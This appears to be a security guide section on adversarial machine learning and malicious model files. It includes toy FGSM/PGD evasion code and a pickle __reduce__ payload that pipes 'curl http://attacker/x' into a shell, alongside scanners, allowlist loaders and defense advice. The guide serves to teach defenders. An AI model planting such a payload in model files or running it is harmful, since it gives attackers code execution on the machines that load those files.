Adversarial machine learning
A decade of research that still applies to any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infrastructure attacks covered later. Five families, each with a canonical example; evasion is worked through below.
| Family | Target / asset | Canonical example |
|---|---|---|
| Evasion | Inference-time decision | FGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry) |
| Poisoning / backdoor | Training/fine-tune data | BadNets trigger: model behaves until it sees the attacker’s cue (Gu) |
| Extraction | Model IP via API | Rebuild a functional copy from query/response pairs (Tramèr) |
| Membership inference | Training-set privacy | Was this record used to train? (Shokri) |
| Model inversion | Training-data reconstruction | Recover representative faces from a recognition model (Fredrikson) |
```
# A tiny perturbation in the direction that most increases the model's loss
# flips the prediction while looking unchanged to a human.
perturbation = epsilon * sign( gradient_of_loss_wrt_input )   # epsilon ~ a few /255
adversarial_image = original_image + perturbation
# model(original_image)    -> "stop sign"   (0.98)
# model(adversarial_image) -> "speed limit" (0.91)   visually identical
# DEFENSE: adversarial training (train on such examples), input
# transformation/randomization, and report robustness under PGD, not just FGSM.
```
That single idea - move along the gradient of the loss - underlies the whole family; stronger attacks (PGD) just iterate it, and transfer means an attacker can craft it on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).
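The update rule above can be made concrete on a toy model. What follows is a minimal sketch, assuming a hand-picked four-feature logistic regression: the weights `W`, bias `B`, input `x`, and the epsilon and step values are all illustrative and do not come from any real classifier. For this model the gradient of the cross-entropy loss with respect to the input has the closed form `(p - y) * w`, so no autodiff library is needed. A real attack on a deep network would obtain the same gradient from the framework instead.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def predict(w, b, x):
    """Probability of class 1 under a logistic-regression model."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)

def loss_gradient_wrt_input(w, b, x, y):
    """Gradient of binary cross-entropy w.r.t. the input: (p - y) * w."""
    p = predict(w, b, x)
    return [(p - y) * wi for wi in w]

def sign(v):
    return (v > 0) - (v < 0)

def fgsm(w, b, x, y, epsilon):
    """One step of size epsilon along the sign of the input gradient."""
    grad = loss_gradient_wrt_input(w, b, x, y)
    return [xi + epsilon * sign(g) for xi, g in zip(x, grad)]

def pgd(w, b, x, y, epsilon, step, iters):
    """Iterated FGSM, projected back into the L-infinity ball around x."""
    x_adv = list(x)
    for _ in range(iters):
        grad = loss_gradient_wrt_input(w, b, x_adv, y)
        x_adv = [xa + step * sign(g) for xa, g in zip(x_adv, grad)]
        x_adv = [min(max(xa, xo - epsilon), xo + epsilon)
                 for xa, xo in zip(x_adv, x)]
    return x_adv

# Hypothetical toy model and input (assumed values, for illustration only).
W = [2.0, -3.0, 1.5, -1.0]
B = 0.1
x = [0.2, 0.1, 0.2, 0.1]          # true label y = 1

x_fgsm = fgsm(W, B, x, y=1, epsilon=0.1)
x_pgd = pgd(W, B, x, y=1, epsilon=0.1, step=0.025, iters=10)

print("clean:", round(predict(W, B, x), 3))
print("fgsm: ", round(predict(W, B, x_fgsm), 3))
print("pgd:  ", round(predict(W, B, x_pgd), 3))
```

With these assumed numbers the clean input scores about 0.60 for class 1 and the perturbed input about 0.41, so the decision flips although no feature moved by more than 0.1. On a linear model PGD ends at the same point as FGSM; the iteration only pays off on non-linear models. The toy needs a fairly large epsilon because it has four features, whereas an image has thousands of pixels over which a much smaller per-pixel change accumulates.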
Canon
- Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
- Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
- Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
- Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security
For the organization
- Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
- If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
- Rate-limit and monitor prediction APIs against extraction.
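The rate-limiting item can be sketched as a per-client query budget over a sliding time window. This is a minimal illustration, not a production design: the class name `QueryBudget`, its parameters, and the thresholds are hypothetical, and a real deployment would usually enforce this at the API gateway and send denials to monitoring.

```python
import time
from collections import defaultdict, deque

class QueryBudget:
    """Sliding-window limit on prediction queries per client (illustrative)."""

    def __init__(self, max_queries, window_seconds, clock=time.monotonic):
        self.max_queries = max_queries
        self.window = window_seconds
        self.clock = clock                    # injectable so it can be tested
        self.history = defaultdict(deque)     # client_id -> recent timestamps
        self.denied = defaultdict(int)        # client_id -> denied-call count

    def allow(self, client_id):
        """Return True if the client may query now, and record the call."""
        now = self.clock()
        recent = self.history[client_id]
        # Drop timestamps that have aged out of the window.
        while recent and now - recent[0] >= self.window:
            recent.popleft()
        if len(recent) >= self.max_queries:
            self.denied[client_id] += 1       # signal worth alerting on
            return False
        recent.append(now)
        return True
```

A caller would check `budget.allow(client_id)` before serving each prediction. A client whose `denied` count keeps climbing is querying at a volume more consistent with systematic harvesting than with normal use, which makes it a candidate for review.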
Model files are executable: serialization & deserialization attacks
A trained model ships as a file, and the common formats are not inert data: they can run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib) calls attacker-chosen callables during deserialization, and TensorFlow/Keras Lambda layers (including those stored in HDF5 files) and TorchScript can likewise carry executable code. Loading an attacker’s model file is therefore arbitrary code execution on the machine that loads it, a supply-chain RCE that needs no exploit, just a call to load the model. The pickle RCE primitive has been known since 2011; what changed is that model-sharing hubs turned it into a distribution channel.
```python
# pickle calls __reduce__ on load to reconstruct an object; an attacker
# returns a callable + args, and the "reconstruction" runs their code.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://attacker/x | sh",))   # runs on torch.load()
# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.
# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);
# PyTorch weights_only=True is the default since v2.6; scan in CI before promotion.
```
This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.
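The idea behind scanning pickle imports can be illustrated with the standard library alone. The sketch below is not how picklescan is implemented. It is a simplified heuristic that walks the opcode stream with `pickletools.genops`, without ever unpickling, and lists the module/name pairs the file would import. The allowlist `SAFE_IMPORTS` and the function names are assumptions made for the example. The `STACK_GLOBAL` handling guesses from the two most recent string arguments, which covers what `pickle.dumps` normally emits but could be defeated by a hand-crafted stream.

```python
import pickle
import pickletools

# Hypothetical allowlist; a real gate would be tuned to the model format.
SAFE_IMPORTS = {("collections", "OrderedDict")}

def list_imports(data: bytes):
    """Return (module, name) pairs a pickle would import, without loading it."""
    imports = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            module, _, name = arg.partition(" ")   # arg is "module name"
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Module and name were pushed as strings earlier (heuristic).
            if len(recent_strings) >= 2:
                imports.append((recent_strings[-2], recent_strings[-1]))
            else:
                imports.append(("?", "?"))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return imports

def is_suspicious(data: bytes) -> bool:
    """Flag non-allowlisted imports; treat unparseable input as suspicious."""
    try:
        found = list_imports(data)
    except Exception:
        return True   # a "broken" pickle fails the gate instead of passing it
    return any(item not in SAFE_IMPORTS for item in found)

class EvalPayload:
    """Demo object only: it is serialized below but never loaded."""
    def __reduce__(self):
        return (eval, ("1 + 1",))

benign = pickle.dumps({"w": [1.0, 2.0]}, protocol=4)
flagged = pickle.dumps(EvalPayload(), protocol=4)

print(list_imports(benign), is_suspicious(benign))
print(list_imports(flagged), is_suspicious(flagged))
```

Failing closed on a parse error is a deliberate choice in this sketch. A pickle executes opcode by opcode, so a payload placed before a corrupted tail can still run when loaded, even though a scanner that gives up on the malformed stream would report nothing.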
Defenses for the model artifact
- Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
- Use restricted loaders - PyTorch’s weights-only unpickler (weights_only=True) is the default from v2.6, refusing arbitrary callables on load.
- Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
- Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).
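The restricted-loader defense in the list above can be sketched with the standard library by overriding `pickle.Unpickler.find_class`. This follows the pattern in the Python documentation and is not PyTorch's actual implementation. The names `AllowlistUnpickler`, `safe_loads`, and the contents of `ALLOWED` are assumptions made for the example.

```python
import io
import pickle

# Hypothetical allowlist: only these globals may be resolved during load.
ALLOWED = {("collections", "OrderedDict")}

class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside ALLOWED."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked import: {module}.{name}")

def safe_loads(data: bytes):
    """Deserialize data, raising UnpicklingError on any disallowed import."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Plain containers and allowlisted classes load as usual. A pickle whose `__reduce__` names `os.system`, `eval`, or any other callable outside the allowlist raises `pickle.UnpicklingError` before that callable is ever resolved, let alone invoked. The allowlist has to stay small: any permitted callable with side effects reopens the hole.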
Sources
- ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
- JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
- PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format